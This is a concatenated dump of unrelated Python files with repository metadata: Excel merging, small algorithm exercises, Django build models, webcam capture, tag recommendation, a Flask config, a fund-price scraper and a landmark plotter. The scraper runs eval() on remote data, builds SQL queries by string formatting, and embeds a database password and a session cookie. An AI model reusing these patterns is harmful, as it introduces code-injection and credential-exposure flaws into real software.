sheet6601.write(row6601 + i - 1, j, data)
excel6601.save('new6601all.xls')
data6603 = xlrd.open_workbook("D:\py\\6603all.xlsx")
table6603 = data6603.sheets()[0]
nrows6603 = table6603.nrows
excel6603 = copy(data6603)
sheet6603 = excel6603.get_sheet(0)
row6603 = nrows6603
for i in xrange(1, nrows660311):
for j, data in enumerate(eletable660311.row_values(i)):
sheet6603.write(row6603 + i - 1, j, data)
excel6603.save('new6603all.xls')
'''
alldata6601 = xlrd.open_workbook("D:\py\\6601all.xlsx")
alltable6601 = alldata6601.sheets()[0]
allnrows6601 = alltable6601.nrows
col6601 = alltable6601.col_values(7)
new_col6601 = set(col6601)
alldata6603 = xlrd.open_workbook("D:\py\\6603all.xls")
alltable6603 = alldata6603.sheets()[0]
allnrows6603 = alltable6603.nrows
col6603 = alltable6603.col_values(6)
new_col6603 = set(col6603)
'''
alldata6002 = xlrd.open_workbook("D:\py\\new6002all.xls")
alltable6002 = alldata6002.sheets()[0]
allnrows6002 = alltable6002.nrows
col6002 = alltable6002.col_values(6)
new_col6002 = set(col6002)
alldata6601 = xlrd.open_workbook("D:\py\\new6601all.xls")
alltable6601 = alldata6601.sheets()[0]
allnrows6601 = alltable6601.nrows
col6601 = alltable6601.col_values(7)
new_col6601 = set(col6601)
alldata6603 = xlrd.open_workbook("D:\py\\new6603all.xls")
alltable6603 = alldata6603.sheets()[0]
allnrows6603 = alltable6603.nrows
col6603 = alltable6603.col_values(6)
new_col6603 = set(col6603)
allyunbian = new_col6002 | new_col6601 | new_col6603
print len(allyunbian)
adic = {}
for data in allyunbian:
for j in range(1, allnrows6002):
row = alltable6002.row_values(j)
if data == row[6]:
adic.setdefault(data, {}).setdefault(6002, []).append(j)
for data in allyunbian:
for j in range(1, allnrows6601):
row = alltable6601.row_values(j)
if data == row[7]:
adic.setdefault(data, {}).setdefault(6601, []).append(j)
for data in allyunbian:
for j in range(1, allnrows6603):
row = alltable6603.row_values(j)
if data == row[6]:
adic.setdefault(data, {}).setdefault(6603, []).append(j)
output = open('data.pkl', 'wb')
pickle.dump(adic, output)
output.close()
'''
excle_Workbook = Workbook()
excel_sheet_name = datetime.datetime.now().strftime('%Y-%m-%d')
excel_sheet = excle_Workbook.add_sheet(excel_sheet_name)
'''
| [
"butter_007@163.com"
] | butter_007@163.com |
e99b1b904a183481565ed38808f38f03702f4e60 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2739/60825/244336.py | 391935b7e27570792c33d23a3858845f5b95b823 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 440 | py | res=[]
res = []  # accumulates every valid combination found by printAns


def printAns(currList, currSum, target, k):
    """Depth-first search collecting into ``res`` every strictly increasing
    combination of ``k`` distinct digits (1-9) whose sum equals ``target``.

    currList -- digits chosen so far, in ascending order
    currSum  -- running sum of ``currList``
    """
    # BUG FIX: the original used Java operators (&&, ||) and list.size(),
    # which are not valid Python, and indexed currList[-1] on an empty list.
    if currSum == target and len(currList) == k:
        res.append(currList)
        return
    if currSum > target or len(currList) > k:
        return
    # Candidates are digits strictly greater than the last chosen digit, so
    # each combination is generated exactly once (no duplicates/permutations);
    # 1 is the floor when currList is still empty.
    start = currList[-1] + 1 if currList else 1
    for i in range(start, 10):
        t = currList[:]
        t.append(i)
        printAns(t, currSum + i, target, k)
# Read one line such as "3, 15": the first character is k, everything from
# index 3 onward is the target sum, and the results are printed at the end.
# NOTE(review): this fixed-position parse assumes k is a single digit and a
# two-character separator -- confirm against the judge's input format.
s=input()
k=int(s[0])
target=int(s[3:])
printAns([], 0, target, k)
print(res)
"1069583789@qq.com"
] | 1069583789@qq.com |
e71c2fa72058b5bcecd3babdb7ec56d2c90f205f | 8499de9ee574989f30f34a6b803b88423ece8f1e | /python/Arithmetic Slices.py | fd40ebbcf4d2c37781b08d9cef66fbcea302df31 | [] | no_license | aaaCcchaj/LeetCode | 0a1f16b10339728bba3a5e7db7dfa1bb6d2b520f | 25fbd1cb24df1a91616b3b93af3236c17f8a6bd0 | refs/heads/master | 2020-05-30T05:06:40.765450 | 2018-12-21T01:55:04 | 2018-12-21T01:55:04 | 41,406,311 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,136 | py | class Solution(object):
def numberOfArithmeticSlices(self, A):
chaList = []
for index in range(len(A) - 1):
chaList.append(A[index+1] - A[index])
chachaList = []
for chaIndex in range(len(chaList) - 1):
chacha = chaList[chaIndex + 1] - chaList[chaIndex]
chachaList.append(chacha)
zeroCounts = []
zeroCount = 0
for chachaIndex in range(len(chachaList)):
if(chachaList[chachaIndex] == 0 ):
zeroCount = zeroCount + 1
if chachaIndex == len(chachaList) - 1:
zeroCounts.append(zeroCount)
elif zeroCount > 0:
zeroCounts.append(zeroCount)
zeroCount = 0
allCount = 0
for cha in zeroCounts:
maxSliceCount = cha + 2
allCount = allCount + 1
for iter in range(3,maxSliceCount):
allCount = allCount + (maxSliceCount - iter +1 )
return allCount
# Ad-hoc smoke test (Python 2 print statement): a constant sequence of five
# zeros contains 3 + 2 + 1 = 6 arithmetic slices.
s = Solution()
A = [0,0,0,0,0]
print s.numberOfArithmeticSlices(A)
"woaipan1023@gmail.com"
] | woaipan1023@gmail.com |
3e241bca87c1106e07b8d5ffd8e53da25cae808a | 8e1141fb8d9bf02d7e1c2fb887d66049d0860714 | /InvenTree/build/models.py | d09e7518785858212cb1d0f2ae5b953b0b916930 | [
"MIT"
] | permissive | ksanchezcld/InvenTree | 73ec392db5149814604e79690b465ae900af0c94 | ceea0533686305077c07c78ffa20ab4227ce2cf4 | refs/heads/master | 2023-02-28T10:07:02.741814 | 2018-05-12T02:44:29 | 2018-05-12T02:44:29 | 165,738,059 | 1 | 0 | MIT | 2023-02-11T19:31:42 | 2019-01-14T21:28:53 | JavaScript | UTF-8 | Python | false | false | 3,216 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.utils.translation import ugettext as _
from django.db import models
from django.core.validators import MinValueValidator
class Build(models.Model):
    """A Build organises the creation of new parts from component parts.

    It uses the part's BOM to determine which component parts are required;
    parts are then taken from stock.
    """

    def get_absolute_url(self):
        """Return the detail-view URL for this build."""
        return '/build/{pk}/'.format(pk=self.id)

    # Build status codes
    PENDING = 10  # Build is pending / active
    HOLDING = 20  # Build is currently being held
    CANCELLED = 30  # Build was cancelled
    COMPLETE = 40  # Build is complete

    BUILD_STATUS_CODES = {PENDING: _("Pending"),
                          HOLDING: _("Holding"),
                          CANCELLED: _("Cancelled"),
                          COMPLETE: _("Complete"),
                          }

    batch = models.CharField(max_length=100, blank=True, null=True,
                             help_text='Batch code for this build output')

    # Status of the build
    status = models.PositiveIntegerField(default=PENDING,
                                         choices=BUILD_STATUS_CODES.items(),
                                         validators=[MinValueValidator(0)])

    # Date the build model was 'created'.
    # BUG FIX: auto_now=True would overwrite this field on *every* save;
    # auto_now_add=True records the timestamp only once, at creation.
    creation_date = models.DateField(auto_now_add=True, editable=False)

    # Date the build was 'completed'
    completion_date = models.DateField(null=True, blank=True)

    # Brief build title
    title = models.CharField(max_length=100, help_text='Brief description of the build')

    # A reference to the part being built
    # Only 'buildable' parts can be selected
    part = models.ForeignKey('part.Part', on_delete=models.CASCADE,
                             related_name='builds',
                             limit_choices_to={'buildable': True},
                             )

    # How many parts to build?
    quantity = models.PositiveIntegerField(default=1,
                                           validators=[MinValueValidator(1)],
                                           help_text='Number of parts to build')

    # Notes can be attached to each build output
    notes = models.TextField(blank=True)

    @property
    def required_parts(self):
        """Return one dict per BOM line: the sub-part, quantity per build,
        and total quantity required for this build's quantity."""
        parts = []
        for item in self.part.bom_items.all():
            part = {'part': item.sub_part,
                    'per_build': item.quantity,
                    'quantity': item.quantity * self.quantity
                    }
            parts.append(part)
        return parts

    @property
    def can_build(self):
        """Return True if there is enough stock of every required part."""
        for item in self.required_parts:
            if item['part'].total_stock < item['quantity']:
                return False
        return True

    @property
    def is_active(self):
        """Is this build active?

        An active build is either:
        - Pending
        - Holding
        """
        return self.status in [
            self.PENDING,
            self.HOLDING
        ]

    @property
    def is_complete(self):
        """Return True once the build has been marked complete."""
        return self.status == self.COMPLETE
"oliver.henry.walters@gmail.com"
] | oliver.henry.walters@gmail.com |
8a1faace4236c8808e8a2a695d9cd49f1bb4eb87 | 4e8876705ab0cbd8f2fdd500176f92a961ad3882 | /test.py | 90644a55adf50d79845eb994bbfdb54a337fc339 | [] | no_license | Jecosine/wcmonitor | 031c3940314fa6f2481864f498ed2cfaf2f663ba | 66089a0a7dcbaeb4db7653ed011aa8f7bfa1fda2 | refs/heads/master | 2020-03-27T10:29:27.027542 | 2018-08-29T13:56:35 | 2018-08-29T13:56:35 | 146,423,281 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 424 | py | import cv2
from PIL import Image
# Capture 100 frames from the default webcam and write them to "a.avi"
# using the legacy OpenCV 2.4 API (cv2.cv.* constants).
cap = cv2.VideoCapture(0)
count = 0
# NOTE(review): ``size`` is computed from the camera but never used -- the
# VideoWriter below hard-codes (640, 480); if the camera resolution differs,
# the written frames may be invalid. Consider passing ``size`` instead.
size = (int(cap.get(cv2.cv.CV_CAP_PROP_FRAME_WIDTH)),int(cap.get(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT)))
# MJPG-encoded AVI at 20 fps.
writer = cv2.VideoWriter("a.avi",cv2.cv.CV_FOURCC("M","J","P","G"),20,(640,480))
while True:
    if count >= 100:
        break
    # cap.read() returns (success_flag, frame); the flag is ignored here.
    _,frame = cap.read()
    #frame = cv2.flip(frame,1)
    writer.write(frame)
    count += 1
cap.release()
writer.release()
| [
"mj_ol@outlook.com"
] | mj_ol@outlook.com |
a91cd2c4243b8a73856daf5edfc2383e9ed0c51a | 0619bc9e4fc97f99a8eed35aaa64976848ed3f18 | /src/MENIA_4.2-get_full_community_tags_recommend_record.py | f8d6d4c420585a5b665187dccafada58620b791d | [
"MIT"
] | permissive | SmartServiceGroup/SOworkspace | c7e04628e9dc2a2fd719c6661dfaadb19f1c9362 | 74bbcfa62c7e293b2b02f23249ac408aa22b44af | refs/heads/master | 2023-06-11T20:31:34.072302 | 2021-07-07T13:59:14 | 2021-07-07T13:59:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,285 | py | import json
from tqdm import tqdm
from collections import OrderedDict
from util.community_info.api_info_center import APIinfoCenter
from util.community_info.so_thread_info_center import ThreadInfoCenter
from util.config import COMMUNITY_RECORD_STORE_PATH, JAVADOC_GLOBAL_NAME, HOMURA_COMMUNITY_TAGS_RECOMMEND_STORE_PATH, API_THREAD_ID_MAP_STORE_PATH
'''
In the HOMURA system, to better present an overview of each learning
section's content, the most frequent tags of each community are analysed
and generated here, to help users decide which community to study.
'''
def get_tag_recommend_list(api_community: list, info_center: ThreadInfoCenter, api_thread_id_map: dict) -> list:
    """Return up to ten most frequent non-'java' tags among the SO threads
    linked to the APIs of this community, or None for trivial communities."""
    # Communities of at most one API carry no recommendation signal.
    if len(api_community) <= 1:
        return None

    # Union of all thread ids linked to any API in the community.
    thread_ids = set()
    for api in api_community:
        thread_ids.update(api_thread_id_map.get(api, []))
    threads = info_center.batch_get_thread_detail_info(list(thread_ids))

    # Tally tag frequencies; the ubiquitous 'java' tag is uninformative.
    tag_counts = {}
    for thread in threads:
        for tag in thread['Tags'].strip('<').strip('>').split('><'):
            if tag != 'java':
                tag_counts[tag] = tag_counts.get(tag, 0) + 1

    # Most frequent first (stable sort keeps insertion order on ties).
    ranked = sorted(tag_counts, key=tag_counts.get, reverse=True)
    return ranked[:10]
def recommend_tags_for_each_community(doc_name: str = JAVADOC_GLOBAL_NAME):
    """Compute and persist the recommended-tag list for every API community."""
    # Load the API -> SO-thread-id mapping and the community partition.
    with open(API_THREAD_ID_MAP_STORE_PATH[doc_name], 'r', encoding='utf-8') as fin:
        api_thread_map = json.load(fin)
    with open(COMMUNITY_RECORD_STORE_PATH[doc_name], 'r', encoding='utf-8') as fin:
        communities = dict(json.load(fin))

    info_center = ThreadInfoCenter(doc_name)
    # Preserve community order in the output file.
    result = OrderedDict(
        (community_id, get_tag_recommend_list(members, info_center, api_thread_map))
        for community_id, members in tqdm(list(communities.items()))
    )

    with open(HOMURA_COMMUNITY_TAGS_RECOMMEND_STORE_PATH[doc_name], 'w', encoding='utf-8') as fout:
        json.dump(result, fout, indent=2, ensure_ascii=False)
# Entry point: generate tag recommendations for the default Java doc corpus.
if __name__ == "__main__":
    recommend_tags_for_each_community(JAVADOC_GLOBAL_NAME)
| [
"yhang1996@126.com"
] | yhang1996@126.com |
57255f12107e6c6221c477520208776d0bd84806 | 8eada23d63e782bb53cab7ac7f9c39d17c53ab19 | /venv/bin/epylint | 53d422f995b67b1158d191c5b72131b1751f8088 | [] | no_license | bnsmcx/probable-guacamole | a34a4443366a9570b6427c127f7182ded8b23e90 | 07f14b12eaa1bca04cb1df4980c68fa34b74285a | refs/heads/master | 2023-05-14T13:23:01.378419 | 2021-06-14T15:34:48 | 2021-06-14T15:34:48 | 369,746,545 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | #!/home/ben/repos/probable-guacamole/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pylint import run_epylint
# Console-script entry point generated by setuptools: normalise argv[0]
# (strip Windows "-script.pyw"/".exe" suffixes) before handing control to pylint.
if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(run_epylint())
| [
"bnsmcx@protonmail.ch"
] | bnsmcx@protonmail.ch | |
968f81a4dc5b36969b0e07af25e2060611100b95 | 363f047a1bf8c5758f036b1de35c8d8c6b3ff6c2 | /FinalModel/Demo/Demo/custom_functions/__init__.py | bef8613cd41f4110dbca4043699969203d25e27f | [] | no_license | EnricRovira/TFM_DNN_Recomendator | 38c78dafd3ee9f9e672f6c3416bc75c912d08371 | d51ffadf47444270dbbaca0edcb24b3e5ebecd40 | refs/heads/master | 2023-05-24T18:43:38.753937 | 2019-09-02T21:28:09 | 2019-09-02T21:28:09 | 174,575,953 | 1 | 1 | null | 2023-05-22T22:16:04 | 2019-03-08T16:59:18 | Jupyter Notebook | UTF-8 | Python | false | false | 152 | py | #!/usr/bin/env python
# coding: utf-8
# Author: Enric Rovira Melendez
from .norm_text import *
from .norm_brands import *
from .norm_images import * | [
"noreply@github.com"
] | EnricRovira.noreply@github.com |
17777c20a723b74de11cf06efd95e6988c74a19c | d2294cf32832f0c546fcca64adda6d4f40dccd30 | /GPMmodulos/webapp/configs/config.py | 9a49bd68ebb9388cbdad06086b0d463be8b6aa21 | [] | no_license | Franq17/GPM | 2fa1640cf6fdf93d126f9dddb77f9ee5935631a9 | 3a98a2fd63c7a302b87574860da071bd530e556a | refs/heads/master | 2016-09-06T11:43:36.478442 | 2013-06-22T10:11:03 | 2013-06-22T10:11:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,868 | py | # -*- coding: utf-8 -*-
import os
class BaseConfig(object):
    """Settings shared by every Flask configuration profile."""
    # Get app root path
    # ../../configs/config.py
    _basedir = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
    PROJECT = "webapp"
    DEBUG = False
    TESTING = False
    ADMINS = frozenset(['youremail@yourdomain.com'])
    # os.urandom(24)
    # NOTE(review): hard-coded placeholder secret -- must be replaced with a
    # random value (e.g. os.urandom(24)) before any real deployment.
    SECRET_KEY = 'secret key'
class DevConfig(BaseConfig):
    """Development profile: verbose SQL, local Postgres, Gmail SMTP."""
    DEBUG = True
    # ===========================================
    # Flask-Sqlalchemy
    #
    # http://packages.python.org/Flask-SQLAlchemy/config.html
    SQLALCHEMY_ECHO = True
    # Database connection URI, change to suit yourself.
    # NOTE(review): credentials are committed in source -- fine for a local
    # dev database only; never reuse this pattern in production config.
    SQLALCHEMY_DATABASE_URI = 'postgresql://postgres:postgres@127.0.0.1/webapp2'
    #SQLALCHEMY_DATABASE_URI = 'mysql://username:password@server/db' # mysql
    # ===========================================
    # Flask-babel
    #
    ACCEPT_LANGUAGES = ['zh']
    BABEL_DEFAULT_LOCALE = 'en'
    # ===========================================
    # Flask-cache
    #
    CACHE_TYPE = 'simple'
    CACHE_DEFAULT_TIMEOUT = 60
    # ===========================================
    # Flask-mail
    #
    # Should be imported from env var.
    # https://bitbucket.org/danjac/flask-mail/issue/3/problem-with-gmails-smtp-server
    MAIL_DEBUG = DEBUG
    MAIL_SERVER = 'smtp.gmail.com'
    MAIL_USE_TLS = True
    MAIL_USE_SSL = False
    MAIL_USERNAME = 'gmail_username'
    MAIL_PASSWORD = 'gmail_password'
    DEFAULT_MAIL_SENDER = '%s@gmail.com' % MAIL_USERNAME
    # You should overwrite in production.py
    # Limited the maximum allowed payload to 16 megabytes.
    MAX_CONTENT_LENGTH = 16 * 1024 * 1024
    USER_AVATAR_UPLOAD_FOLDER = os.path.join(BaseConfig._basedir, 'avatar')
class TestConfig(BaseConfig):
    """Test profile: in-memory SQLite, CSRF disabled so forms post directly."""
    TESTING = True
    CSRF_ENABLED = False
    SQLALCHEMY_ECHO = False
    SQLALCHEMY_DATABASE_URI = 'sqlite://'
| [
"franqur17@gmail.com"
] | franqur17@gmail.com |
0f5727ee0cc653a7879a3604cf38380e14e74e22 | 3fbc2ce251aa2325a76248f0fe355d4ed0487720 | /Living_example/Cel_2_Fah.py | 5cc7a4d783da51bb9b7e36e672de08577d6723ac | [] | no_license | Jenychen1996/Basic-Python-FishC.com | 4c3aab1b98b2d3e55da51523222440c4bf260864 | 191823e05510f6a198847673cf9eba2c480e15f4 | refs/heads/master | 2020-05-04T13:03:25.292555 | 2019-04-14T18:13:38 | 2019-04-14T18:13:38 | 179,146,104 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 838 | py | # -*- coding:utf-8 -*-
"""
定义一个类实现摄氏度到华氏度的转换(转换公式:华氏度 = 摄氏度*1.8+32)
"""
class C2F(float):
    """A float subclass whose value is the Fahrenheit equivalent of a Celsius input."""

    def __new__(cls, arg=0.0):
        # Convert at construction time; the instance *is* the Fahrenheit value.
        fahrenheit = arg * 1.8 + 32
        return super(C2F, cls).__new__(cls, fahrenheit)
# Demo: 32 degrees Celsius prints as its Fahrenheit equivalent (89.6).
print(C2F(32))
class Celsius:
    """Data descriptor holding a Celsius temperature.

    The value lives on the descriptor object itself, so all instances of the
    owner class observe the same temperature (intentional in this example).
    """

    def __init__(self, value=26.0):
        self.value = value

    def __get__(self, obj, objtype):
        return self.value

    def __set__(self, obj, new_value):
        # Always store as float so reads are uniformly numeric.
        self.value = float(new_value)
class Fahrenheit:
    """Virtual Fahrenheit view over an owner's ``cel`` attribute.

    Reading converts the stored Celsius value; writing converts back and
    stores the Celsius equivalent on the owner.
    """

    def __get__(self, obj, objtype):
        return obj.cel * 1.8 + 32

    def __set__(self, obj, degrees):
        obj.cel = (float(degrees) - 32) / 1.8
class Temperature:
    # ``cel`` stores the Celsius value (on the Celsius descriptor); ``fah``
    # is a computed Fahrenheit view that reads and writes ``cel``.
    cel = Celsius()
    fah = Fahrenheit()
# Demo: read the default, then drive each unit through the other.
temp = Temperature()
print(temp.cel)   # default 26.0 C
print(temp.fah)   # its Fahrenheit equivalent
temp.cel = 30
print(temp.fah)   # 86.0
temp.fah = 100
print(temp.cel)   # ~37.78
| [
"2057359164@qq.com"
] | 2057359164@qq.com |
974c0b225a53e22236f988a12015c3e45a4257bf | ecb0d14498e266fddf108f81bb1ea28d80dbd9f9 | /internal/chandlerdb/chandlerdb/schema/Alias.py | d1f94fbc8c67c3d2f5803a7722b0b4aa627d39ab | [] | no_license | Tadashi-Hikari/Chandler-Junkyard | 9674101cdbee20c37052cbdde3fba75e0815756f | 9b436bc5607c63f24f915a9e1753f55ccbff523f | refs/heads/master | 2023-04-06T11:23:02.168125 | 2021-04-08T01:58:50 | 2021-04-08T01:58:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,094 | py | # Copyright (c) 2003-2007 Open Source Applications Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from chandlerdb.util.c import _hash, _combine
from chandlerdb.schema.c import CAttribute
from chandlerdb.schema.Types import Type
from chandlerdb.schema.TypeHandler import TypeHandler
class Alias(Type):
    """A schema type that stands for one of several concrete types.

    If the 'types' reference is absent the alias is open: it recognizes any
    value and defers to the generic TypeHandler. Otherwise every operation
    dispatches to the first listed type that recognizes the value.
    (Python 2 source: note the old-style ``raise TypeError, ...`` syntax.)
    """

    def getImplementationType(self):
        # An alias has no concrete implementation type of its own.
        return None

    def isAlias(self):
        return True

    def getFlags(self):
        """OR together the flags of all aliased types (plus the ALIAS bit);
        an open alias gets the PROCESS bit instead."""
        flags = CAttribute.ALIAS
        if 'types' in self._references:
            for t in self._references['types']:
                flags |= t.getFlags()
        else:
            flags |= CAttribute.PROCESS
        return flags

    def type(self, value):
        """Return the first aliased type recognizing ``value``; for an open
        alias, fall back to the global type handler. None if unrecognized."""
        if 'types' in self._references:
            for t in self._references['types']:
                if t.recognizes(value):
                    return t
        else:
            return TypeHandler.typeHandler(self.itsView, value)
        return None

    def recognizes(self, value):
        # An open alias recognizes everything.
        if 'types' not in self._references:
            return True
        for t in self.types:
            if t.recognizes(value):
                return True
        return False

    def typeXML(self, value, generator):
        """Serialize ``value`` as XML via the first recognizing aliased type."""
        if 'types' not in self._references:
            super(Alias, self).typeXML(value, generator)
            return
        for t in self.types:
            if t.recognizes(value):
                t.typeXML(value, generator)
                return
        raise TypeError, "value '%s' of type '%s' unrecognized by %s" %(value, type(value), self.itsPath)

    def writeValue(self, itemWriter, record, item, version, value, withSchema):
        """Write ``value`` into ``record`` via the first recognizing aliased type."""
        if 'types' not in self._references:
            return super(Alias, self).writeValue(itemWriter, record, item,
                                                 version, value, withSchema)
        for t in self.types:
            if t.recognizes(value):
                return t.writeValue(itemWriter, record, item,
                                    version, value, withSchema)
        raise TypeError, "value '%s' of type '%s' unrecognized by %s" %(value, type(value), self.itsPath)

    def hashItem(self):
        """
        Compute a hash value from this aliase's schema.
        The hash value is computed from the aliase's path and types.
        @return: an integer
        """
        hash = _hash(str(self.itsPath))
        if 'types' in self._references:
            for t in self.types:
                hash = _combine(hash, t.hashItem())
        return hash
| [
"vajda@3c49585b-f0f7-0310-b5f9-dfe92a88fbfe"
] | vajda@3c49585b-f0f7-0310-b5f9-dfe92a88fbfe |
f53bd2fa1b9e25a2b4a125217ad09295c26c3dc9 | e7c28ce96a6e706138a50d858d82878bb65c6a93 | /腾讯基金净值中心-His.py | f4771c86452bdd388ebf0bdc19a3e3a79277bf7c | [] | no_license | xiaotong9005/tongyun | 86b9e5c97d166f1785036ab3fffd85d50f316e7b | dfab95db5fe9bb38ee30eb563d2847647f73cc3d | refs/heads/master | 2021-08-19T21:57:04.407623 | 2017-11-27T14:06:11 | 2017-11-27T14:06:11 | 111,663,768 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,516 | py | import requests
import pyodbc
from bs4 import BeautifulSoup
def transf(a, b):
    """Return ``a`` unless it is the '--' placeholder, in which case return ``b``."""
    return b if a == '--' else a
# Browser-like request headers so the Tencent fund endpoint serves data.
# NOTE(review): the Cookie value is a captured session -- it will expire.
headers={
'Accept':'*/*',
'Accept-Encoding':'gzip, deflate',
'Accept-Language':'zh-CN,zh;q=0.8',
'Connection':'keep-alive',
'Cookie':'tvfe_boss_uuid=5e27e9f9701779d7; pac_uid=1_2675059005; _gscu_661903259=79824025jlu8xj64; RK=GIdvB2Bv/C; pgv_pvi=2648977408; UM_distinctid=15cd7d528361a5-0902ce33389b2a-3715834-100200-15cd7d52837ef; ts_uid=8007293614; ts_refer=www.baidu.com/link; ts_uid=8007293614; RECENT_CODE=000737_51%7C603129_1%7C164906_51%7C161219_51%7C160716_51%7C000876_51%7C601857_1%7C600104_1%7C000988_0%7C000193_0%7C100022_0%7C001781_0%7C165521_0%7C162214_0%7C000898_51%7C399550_51%7C070032_0%7C001852_0%7C000969_0%7C001728_0%7C150276_51%7C16181L_0; dm_login_weixin_rem=; dm_login_weixin_scan=; logout_page=; ptcz=5c8223be0ba5004c0268b6238147a7e3d5e2dcfcac5d1662006b9feecc402eba; pt2gguin=o2675059005; mbCardUserNotLoginTips=1; pgv_info=ssid=s8630159920; pgv_pvid=7066792342; o_cookie=2675059005',
'Host':'stock.finance.qq.com',
'Referer':'http://stockhtm.finance.qq.com/fund/jzzx/index.htm',
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 UBrowser/6.1.3397.16 Safari/537.36'
}
# Connect to the local SQL Server instance holding the fund history tables.
db=pyodbc.connect('DRIVER={SQL Server};SERVER=localhost;PORT=1433;DATABASE=symbol;UID=sa;PWD=xiaotong123')
cur=db.cursor()
# Fetch the list of trading dates up to 2015-05-30 to iterate over.
datelist=[]
qsql="select [dateid] from [symbol].[dbo].[date] where dateid<='20150530'"
try:
    cur.execute(qsql)
    results=cur.fetchall()
    for row in results:
        datelist.append(row[0])
# NOTE(review): bare except hides the real DB error -- the message below
# means "failed to fetch the date list".
except:
    print('DateList获取失败')
# For each date, download that day's fund NAV snapshot and store it.
for i in datelist:
    url="http://stock.finance.qq.com/cgi-bin/fund/jzzx_d?fm=js&d="+i+""
    #print(url,end='...')
    res=requests.get(url,headers=headers)
    datastr=BeautifulSoup(res.text,'html.parser').text
    a=datastr.find('var v_kfs=')+len('var v_kfs=')  # start index just past the 'var v_kfs=' prefix
    c=datastr.find(';/*')  # index where the useful payload ends
    # NOTE(review): eval() on a remote payload is dangerous -- the server
    # controls this string; json/ast.literal_eval would be safer.
    datastr=eval(datastr[a:c])
    num=1
    for code in datastr:
        #print(num,end=' ')
        if code[0]in ('001275'):  # only extract this one specific fund
            # Insert-if-absent, keyed on (fund code, NAV date).
            # NOTE(review): SQL built via %-formatting from remote data is
            # injection-prone; prefer parameterized cur.execute(sql, params).
            sql='''
            declare @count int
            select @count=count(*)
            from [基金净值中心_HIS]
            where [基金代码]='%s'
            and [净值日期]='%s'
            if @count=0
            begin
            insert into [基金净值中心_HIS] ([基金代码],[简称],[单位净值],[涨跌],[增长率],[累计净值],[净值日期])
            values('%s','%s',%s,%s,%s,%s,'%s')
            end
            '''%(code[0],code[6],code[0],code[1],transf(code[2],0),transf(code[3],0),transf(code[4],0),transf(code[5],0),code[6])
            try:
                cur.execute(sql)
                db.commit()
                print(code[0],code[6],'数据提取成功,简称:',code[1])
            except:
                db.rollback()
                print(code[0],'数据提取失败,简称:',code[1])
        num=num+1
db.close()
| [
"2675059005@qq.com"
] | 2675059005@qq.com |
3b81da56caa93e61d28fabd2fb15cbe2d6049842 | af6feb644d2435e1d656556261e5e100209beb1c | /helper/show_pred.py | 3e501e41b0d01880007c112e02a8e8be86dcecf8 | [
"MIT"
] | permissive | liusida/TorchServe_FaceLandmark_Example | f2ca5d1e9cde2eed340ce46584a06cb0e16ef4ac | 1e854f2f82874255b59ca27b19d3a3254fe69636 | refs/heads/main | 2023-04-26T16:25:18.421724 | 2021-05-26T03:25:00 | 2021-05-26T03:25:00 | 370,864,633 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,081 | py | import collections
import matplotlib.pyplot as plt
def show_pred(preds, input_img, only_2d=True, filename=None):
    """Overlay facial-landmark predictions on an image (optionally in 3D).

    preds     -- landmark array indexed as preds[i, axis]; the slices below
                 assume the standard 68-point layout with x/y (and z for 3D)
                 columns -- TODO confirm shape against the caller.
    input_img -- image displayable by matplotlib's imshow.
    only_2d   -- if False, add a second subplot with a 3D scatter/wireframe.
    filename  -- save the figure there if given, otherwise show it.
    """
    # 2D-Plot
    plot_style = dict(marker='o',
                      markersize=4,
                      linestyle='-',
                      lw=2)
    # Each facial region is a slice into the 68 landmarks plus an RGBA color.
    pred_type = collections.namedtuple('prediction_type', ['slice', 'color'])
    pred_types = {'face': pred_type(slice(0, 17), (0.682, 0.780, 0.909, 0.5)),
                  'eyebrow1': pred_type(slice(17, 22), (1.0, 0.498, 0.055, 0.4)),
                  'eyebrow2': pred_type(slice(22, 27), (1.0, 0.498, 0.055, 0.4)),
                  'nose': pred_type(slice(27, 31), (0.345, 0.239, 0.443, 0.4)),
                  'nostril': pred_type(slice(31, 36), (0.345, 0.239, 0.443, 0.4)),
                  'eye1': pred_type(slice(36, 42), (0.596, 0.875, 0.541, 0.3)),
                  'eye2': pred_type(slice(42, 48), (0.596, 0.875, 0.541, 0.3)),
                  'lips': pred_type(slice(48, 60), (0.596, 0.875, 0.541, 0.3)),
                  'teeth': pred_type(slice(60, 68), (0.596, 0.875, 0.541, 0.4))
                  }
    fig = plt.figure(figsize=plt.figaspect(.5))
    ax = fig.add_subplot(1, 1 if only_2d else 2, 1)
    ax.imshow(input_img)
    # Draw each region as a connected poly-line over the image.
    for pred_type in pred_types.values():
        ax.plot(preds[pred_type.slice, 0],
                preds[pred_type.slice, 1],
                color=pred_type.color, **plot_style)
    ax.axis('off')
    if not only_2d:
        # 3D-Plot
        ax = fig.add_subplot(1, 2, 2, projection='3d')
